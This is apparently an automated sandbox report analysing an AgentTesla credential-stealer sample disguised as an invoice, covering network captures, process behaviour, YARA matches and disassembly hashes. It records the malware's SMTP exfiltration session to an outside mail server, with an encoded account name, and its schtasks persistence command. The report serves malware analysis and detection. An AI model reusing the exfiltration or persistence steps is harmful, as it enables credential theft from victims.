                                                                      Jun 11, 2021 08:06:06.279030085 CEST49772587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:06.279510975 CEST49772587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:06.279810905 CEST49772587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:06.280102015 CEST49772587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:06.280495882 CEST49772587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:06.280710936 CEST49772587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:06.280910969 CEST49772587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:06.281122923 CEST49772587192.168.2.4208.91.199.223
                                                                      Jun 11, 2021 08:06:06.446223021 CEST58749772208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:06.446441889 CEST58749772208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:06.446964979 CEST58749772208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:06.447500944 CEST58749772208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:06.547502041 CEST58749772208.91.199.223192.168.2.4
                                                                      Jun 11, 2021 08:06:06.596929073 CEST49772587192.168.2.4208.91.199.223

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jun 11, 2021 08:04:09.735510111 CEST53497148.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:11.649197102 CEST5802853192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:11.699404955 CEST53580288.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:16.222839117 CEST5309753192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:16.275559902 CEST53530978.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:17.100451946 CEST4925753192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:17.153492928 CEST53492578.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:18.480669022 CEST6238953192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:18.531339884 CEST53623898.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:19.458003044 CEST4991053192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:19.511290073 CEST53499108.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:20.500994921 CEST5585453192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:20.553800106 CEST53558548.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:21.511910915 CEST6454953192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:21.564140081 CEST53645498.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:22.466965914 CEST6315353192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:22.517554045 CEST53631538.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:23.354130030 CEST5299153192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:23.414649963 CEST53529918.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:24.302028894 CEST5370053192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:24.356265068 CEST53537008.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:25.222007990 CEST5172653192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:25.281595945 CEST53517268.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:26.335386038 CEST5679453192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:26.390681028 CEST53567948.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:27.319438934 CEST5653453192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:27.370568991 CEST53565348.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:28.258600950 CEST5662753192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:28.317204952 CEST53566278.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:30.816145897 CEST5662153192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:30.867733955 CEST53566218.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:31.863389015 CEST6311653192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:31.921552896 CEST53631168.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:34.004097939 CEST6407853192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:34.064551115 CEST53640788.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:36.558356047 CEST6480153192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:36.608555079 CEST53648018.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:38.909733057 CEST6172153192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:38.972330093 CEST53617218.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:55.652265072 CEST5125553192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:55.793745041 CEST53512558.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:56.362415075 CEST6152253192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:56.451003075 CEST5233753192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:56.504664898 CEST53615228.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:56.521023035 CEST53523378.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:57.255492926 CEST5504653192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:57.317070961 CEST53550468.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:57.803144932 CEST4961253192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:57.864692926 CEST53496128.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:58.480649948 CEST4928553192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:58.544281960 CEST53492858.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:59.142040968 CEST5060153192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:59.203213930 CEST53506018.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:04:59.832164049 CEST6087553192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:04:59.893954992 CEST53608758.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:05:00.731894016 CEST5644853192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:05:00.795730114 CEST53564488.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:05:01.641452074 CEST5917253192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:05:01.704530954 CEST53591728.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:05:02.185380936 CEST6242053192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:05:02.247342110 CEST53624208.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:05:04.751456022 CEST6057953192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:05:04.813363075 CEST53605798.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:05:14.338932037 CEST5018353192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:05:14.343724012 CEST6153153192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:05:14.412621975 CEST53615318.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:05:14.413042068 CEST53501838.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:05:17.289112091 CEST4922853192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:05:17.351978064 CEST53492288.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:05:48.938035965 CEST5979453192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:05:48.996527910 CEST53597948.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:05:50.675123930 CEST5591653192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:05:50.746380091 CEST53559168.8.8.8192.168.2.4
                                                                      Jun 11, 2021 08:06:01.064519882 CEST5275253192.168.2.48.8.8.8
                                                                      Jun 11, 2021 08:06:01.126252890 CEST53527528.8.8.8192.168.2.4

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Jun 11, 2021 08:06:01.064519882 CEST192.168.2.48.8.8.80xaf7Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Jun 11, 2021 08:06:01.126252890 CEST8.8.8.8192.168.2.40xaf7No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                      Jun 11, 2021 08:06:01.126252890 CEST8.8.8.8192.168.2.40xaf7No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                      Jun 11, 2021 08:06:01.126252890 CEST8.8.8.8192.168.2.40xaf7No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                      Jun 11, 2021 08:06:01.126252890 CEST8.8.8.8192.168.2.40xaf7No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)

                                                                      SMTP Packets

                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                      Jun 11, 2021 08:06:01.980102062 CEST58749771208.91.199.223192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                      Jun 11, 2021 08:06:01.980814934 CEST49771587192.168.2.4208.91.199.223EHLO 247525
                                                                      Jun 11, 2021 08:06:02.145451069 CEST58749771208.91.199.223192.168.2.4250-us2.outbound.mailhostbox.com
                                                                      250-PIPELINING
                                                                      250-SIZE 41648128
                                                                      250-VRFY
                                                                      250-ETRN
                                                                      250-STARTTLS
                                                                      250-AUTH PLAIN LOGIN
                                                                      250-AUTH=PLAIN LOGIN
                                                                      250-ENHANCEDSTATUSCODES
                                                                      250-8BITMIME
                                                                      250 DSN
                                                                      Jun 11, 2021 08:06:02.147583961 CEST49771587192.168.2.4208.91.199.223AUTH login ZHViYWlAc2t5Y29tZXguY29t
                                                                      Jun 11, 2021 08:06:02.315876007 CEST58749771208.91.199.223192.168.2.4334 UGFzc3dvcmQ6
                                                                      Jun 11, 2021 08:06:02.483670950 CEST58749771208.91.199.223192.168.2.4235 2.7.0 Authentication successful
                                                                      Jun 11, 2021 08:06:02.484386921 CEST49771587192.168.2.4208.91.199.223MAIL FROM:<dubai@skycomex.com>
                                                                      Jun 11, 2021 08:06:02.649792910 CEST58749771208.91.199.223192.168.2.4250 2.1.0 Ok
                                                                      Jun 11, 2021 08:06:02.650073051 CEST49771587192.168.2.4208.91.199.223RCPT TO:<dubai@skycomex.com>
                                                                      Jun 11, 2021 08:06:02.825508118 CEST58749771208.91.199.223192.168.2.4250 2.1.5 Ok
                                                                      Jun 11, 2021 08:06:02.825818062 CEST49771587192.168.2.4208.91.199.223DATA
                                                                      Jun 11, 2021 08:06:02.992470026 CEST58749771208.91.199.223192.168.2.4354 End data with <CR><LF>.<CR><LF>
                                                                      Jun 11, 2021 08:06:02.994695902 CEST49771587192.168.2.4208.91.199.223.
                                                                      Jun 11, 2021 08:06:03.280250072 CEST58749771208.91.199.223192.168.2.4250 2.0.0 Ok: queued as B8ED218586B
                                                                      Jun 11, 2021 08:06:04.768742085 CEST49771587192.168.2.4208.91.199.223QUIT
                                                                      Jun 11, 2021 08:06:04.933777094 CEST58749771208.91.199.223192.168.2.4221 2.0.0 Bye
                                                                      Jun 11, 2021 08:06:05.270102024 CEST58749772208.91.199.223192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                      Jun 11, 2021 08:06:05.270399094 CEST49772587192.168.2.4208.91.199.223EHLO 247525
                                                                      Jun 11, 2021 08:06:05.434417009 CEST58749772208.91.199.223192.168.2.4250-us2.outbound.mailhostbox.com
                                                                      250-PIPELINING
                                                                      250-SIZE 41648128
                                                                      250-VRFY
                                                                      250-ETRN
                                                                      250-STARTTLS
                                                                      250-AUTH PLAIN LOGIN
                                                                      250-AUTH=PLAIN LOGIN
                                                                      250-ENHANCEDSTATUSCODES
                                                                      250-8BITMIME
                                                                      250 DSN
                                                                      Jun 11, 2021 08:06:05.434684992 CEST49772587192.168.2.4208.91.199.223AUTH login ZHViYWlAc2t5Y29tZXguY29t
                                                                      Jun 11, 2021 08:06:05.602807999 CEST58749772208.91.199.223192.168.2.4334 UGFzc3dvcmQ6
                                                                      Jun 11, 2021 08:06:05.769443035 CEST58749772208.91.199.223192.168.2.4235 2.7.0 Authentication successful
                                                                      Jun 11, 2021 08:06:05.769814968 CEST49772587192.168.2.4208.91.199.223MAIL FROM:<dubai@skycomex.com>
                                                                      Jun 11, 2021 08:06:05.934775114 CEST58749772208.91.199.223192.168.2.4250 2.1.0 Ok
                                                                      Jun 11, 2021 08:06:05.935218096 CEST49772587192.168.2.4208.91.199.223RCPT TO:<dubai@skycomex.com>
                                                                      Jun 11, 2021 08:06:06.108582973 CEST58749772208.91.199.223192.168.2.4250 2.1.5 Ok
                                                                      Jun 11, 2021 08:06:06.109487057 CEST49772587192.168.2.4208.91.199.223DATA
                                                                      Jun 11, 2021 08:06:06.275418997 CEST58749772208.91.199.223192.168.2.4354 End data with <CR><LF>.<CR><LF>
                                                                      Jun 11, 2021 08:06:06.281122923 CEST49772587192.168.2.4208.91.199.223.
                                                                      Jun 11, 2021 08:06:06.547502041 CEST58749772208.91.199.223192.168.2.4250 2.0.0 Ok: queued as 09EC61857D9

                                                                      Code Manipulations

                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Start time:08:04:16
                                                                      Start date:11/06/2021
                                                                      Path:C:\Users\user\Desktop\Factura PO 1541973.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\Factura PO 1541973.exe'
                                                                      Imagebase:0x960000
                                                                      File size:952832 bytes
                                                                      MD5 hash:429A3063DB13E84F8E0843F46B60753E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.657464491.0000000003FA5000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.657464491.0000000003FA5000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.655976100.0000000002DDB000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      General

                                                                      Start time:08:04:20
                                                                      Start date:11/06/2021
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\lVzZfJoExG' /XML 'C:\Users\user\AppData\Local\Temp\tmp2A03.tmp'
                                                                      Imagebase:0x9e0000
                                                                      File size:185856 bytes
                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:08:04:20
                                                                      Start date:11/06/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff724c50000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:08:04:21
                                                                      Start date:11/06/2021
                                                                      Path:C:\Users\user\Desktop\Factura PO 1541973.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\Factura PO 1541973.exe
                                                                      Imagebase:0x610000
                                                                      File size:952832 bytes
                                                                      MD5 hash:429A3063DB13E84F8E0843F46B60753E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000000.654058658.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000000.654058658.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.910233629.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.910233629.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.912086324.0000000002A91000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.912086324.0000000002A91000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >

                                                                        Executed Functions

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660096398.0000000005D90000.00000040.00000001.sdmp, Offset: 05D90000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *r
                                                                        • API String ID: 0-1320327360
                                                                        • Opcode ID: a50eafba0d0ded2ce6cc60ebb2a3263bb0187935ed850c92e36fa5c1ae702940
                                                                        • Instruction ID: 71dbb752d651a8743d69c2c7d25bdc039cf65951b81595da8e9d7662bcc9dd35
                                                                        • Opcode Fuzzy Hash: a50eafba0d0ded2ce6cc60ebb2a3263bb0187935ed850c92e36fa5c1ae702940
                                                                        • Instruction Fuzzy Hash: 4381B075E042198FDB48CFAAC884AEEBBF2BF89300F14842AD519BB354D7749946CF54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660096398.0000000005D90000.00000040.00000001.sdmp, Offset: 05D90000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *r
                                                                        • API String ID: 0-1320327360
                                                                        • Opcode ID: 92f3cb9e569887857d380bb0e23eaa8d0176f1f3d4b3b2bf13fd7b84d23c4fc1
                                                                        • Instruction ID: fe8e5689c1989f7485c4657c0bdf54c8d1b0f834307dc33fe0547031fcc7300f
                                                                        • Opcode Fuzzy Hash: 92f3cb9e569887857d380bb0e23eaa8d0176f1f3d4b3b2bf13fd7b84d23c4fc1
                                                                        • Instruction Fuzzy Hash: 6581BF75E042198FDB48CFAAC884AEEBBF2FF89300F14842AD519AB354D7749946CF54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660096398.0000000005D90000.00000040.00000001.sdmp, Offset: 05D90000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cff9dcb055ef9c4d24c1f26b31404082c3efae166ba7b0480611e559112b81ff
                                                                        • Instruction ID: 43818454b202b59d0b0904008ab37c106b09d01eb6e0fc26c314980e350f2a78
                                                                        • Opcode Fuzzy Hash: cff9dcb055ef9c4d24c1f26b31404082c3efae166ba7b0480611e559112b81ff
                                                                        • Instruction Fuzzy Hash: 39D12A74E1520ADFCB08EF96C9858AEFBB3FF89300B50955AD415AB214D734DA82CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660096398.0000000005D90000.00000040.00000001.sdmp, Offset: 05D90000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3704999eebe611a5f82331a4bd451c45b4a911819ce2da0dde9a6046f3e7c7f0
                                                                        • Instruction ID: 52e23f86eb98c8796e27f72d8fdb4dba900f2012cbe6fc278547f97433051bde
                                                                        • Opcode Fuzzy Hash: 3704999eebe611a5f82331a4bd451c45b4a911819ce2da0dde9a6046f3e7c7f0
                                                                        • Instruction Fuzzy Hash: E59125B4E092488FDF08DFA9C4446AEBBF2BF8A704F10C06AD409AB354EB348845DF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660096398.0000000005D90000.00000040.00000001.sdmp, Offset: 05D90000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 591818381209678f8de9d8e7760e5252ac8e60fa11f8bdaaae17bbcaf8e52444
                                                                        • Instruction ID: cdc7f2ccc9b94b3ef82352086afed424eacbc3795739e17f130a050ef9152575
                                                                        • Opcode Fuzzy Hash: 591818381209678f8de9d8e7760e5252ac8e60fa11f8bdaaae17bbcaf8e52444
                                                                        • Instruction Fuzzy Hash: A1A1E171E14218CBDF18DFA9C844BEEBBB2FF8A304F14C0AAD508A7255EB7059858F51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660096398.0000000005D90000.00000040.00000001.sdmp, Offset: 05D90000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4582bb5aa1cb86ff9b9cecc5de5769fc4c611f9ba2dc67a67679e51e8f2a4f13
                                                                        • Instruction ID: 8dc4c8536961e0c72368a223b09b413cddbb3eb724aa4ae8b60d721159c73dc7
                                                                        • Opcode Fuzzy Hash: 4582bb5aa1cb86ff9b9cecc5de5769fc4c611f9ba2dc67a67679e51e8f2a4f13
                                                                        • Instruction Fuzzy Hash: 35512770E042098FDB08CFAAD9406AEFBF2FB89300F25C06BD459A7254D7349A41CF64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660096398.0000000005D90000.00000040.00000001.sdmp, Offset: 05D90000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1b53bbd005c605ef09b46c4d39e714b762cce751ed3662a2c33e97ff168826c8
                                                                        • Instruction ID: 97ccbbf42e56508e1bec741473e43d47af688081254167ff3666c96f4434b421
                                                                        • Opcode Fuzzy Hash: 1b53bbd005c605ef09b46c4d39e714b762cce751ed3662a2c33e97ff168826c8
                                                                        • Instruction Fuzzy Hash: 5B511774E182098FEB08CFAAD9405AEFBF2FF89300F15C16BD459A7254D7349A418F54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660096398.0000000005D90000.00000040.00000001.sdmp, Offset: 05D90000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4efca8fd17a5ae9bd205fdb31cd021c2532cacad6153c249ec2ac4413a5e56e6
                                                                        • Instruction ID: 1683568359f9e4f9006380ac758a3793ee2edbeee2610aaff43fb532540901cd
                                                                        • Opcode Fuzzy Hash: 4efca8fd17a5ae9bd205fdb31cd021c2532cacad6153c249ec2ac4413a5e56e6
                                                                        • Instruction Fuzzy Hash: C621F971E116188BDB18CFABD9406DEFBF7AFC9310F14C07AD409A6268DB301A85CE50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660096398.0000000005D90000.00000040.00000001.sdmp, Offset: 05D90000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fb9c04e5381056f01ed8322e0ca77727b313bdf625899a55bbe0edd7a90f4508
                                                                        • Instruction ID: 3007ed34252175ca79beadf358b740d44ba2a7ef4d986f4c994a5f26ce4b6f20
                                                                        • Opcode Fuzzy Hash: fb9c04e5381056f01ed8322e0ca77727b313bdf625899a55bbe0edd7a90f4508
                                                                        • Instruction Fuzzy Hash: F221FC71E156488BDB58CFA7C9442DEBFF3AFC9300F14C07AD809AA258DA341985CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660096398.0000000005D90000.00000040.00000001.sdmp, Offset: 05D90000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !7g@$Im7
                                                                        • API String ID: 0-32501194
                                                                        • Opcode ID: 90e7107f55e0101902e6cab782c029def285e1863eeda71cbd016cb7b83af3cb
                                                                        • Instruction ID: c8289901a912af8701815abd9f024b39c2ac03835e907c333323d852fc30cfc5
                                                                        • Opcode Fuzzy Hash: 90e7107f55e0101902e6cab782c029def285e1863eeda71cbd016cb7b83af3cb
                                                                        • Instruction Fuzzy Hash: 7401D471A16208EFCB4CDFF9D94959DBFF2EBC8201F20C466D44AE7214EB308A508B14
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660096398.0000000005D90000.00000040.00000001.sdmp, Offset: 05D90000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !7g@$Im7
                                                                        • API String ID: 0-32501194
                                                                        • Opcode ID: af794571aa26942097802fdc7b0b759c38f75da08f9fbea92dafc26a3b321152
                                                                        • Instruction ID: 22dcac9bf95e150298140d59474417d0d98f794bd0c7c83c4c02bac3ce53f3d0
                                                                        • Opcode Fuzzy Hash: af794571aa26942097802fdc7b0b759c38f75da08f9fbea92dafc26a3b321152
                                                                        • Instruction Fuzzy Hash: BB01D871A15208EFCB48DFB5D98A59DBFF2EBC8201F20C466D406E7214EB309E518B14
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 013BBCA6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655731901.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 09d37d710db5b0243cb50a2933b1b6ee2b8304756537629d772f329a07ab03f8
                                                                        • Instruction ID: 0a4db82b557d6a5aedffe78f0fa277bdc50c0545f51b8c191de25d13e914aa29
                                                                        • Opcode Fuzzy Hash: 09d37d710db5b0243cb50a2933b1b6ee2b8304756537629d772f329a07ab03f8
                                                                        • Instruction Fuzzy Hash: 18712771A00B059FDB24DF29D48479ABBF1FF88218F00892DD696D7A54EB74E805CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013BE02A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655731901.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: 8b71656b74b21d657c8fbdc4dab74dec88d8fa879b3bb0cca58c5367f6fab444
                                                                        • Instruction ID: 51dd88801167dc4447b4022269e0752f4500bf0f32c92ec277af2da71ec0aa14
                                                                        • Opcode Fuzzy Hash: 8b71656b74b21d657c8fbdc4dab74dec88d8fa879b3bb0cca58c5367f6fab444
                                                                        • Instruction Fuzzy Hash: 3F51BFB1D00309EFDB14CF9AC884ADEBBB5FF48314F24822AE919AB610D7759955CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013BE02A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655731901.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: 02adde6f4452da32fa93743cece938942475f341f94beddb1c1fdd8dff67f489
                                                                        • Instruction ID: f17e5e5e50e8811259ce074157a6c1ab55c2cb08b9781a2cb5759de712034d96
                                                                        • Opcode Fuzzy Hash: 02adde6f4452da32fa93743cece938942475f341f94beddb1c1fdd8dff67f489
                                                                        • Instruction Fuzzy Hash: 2951C0B1D00309DFDB14CF9AC884ADEBBB5FF48314F24812AE919AB210D7759985CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013B7107
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655731901.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: dd48df5d5e3c36a6441da187b20bc637943f8bd2a23f755108999dd759a0a5bc
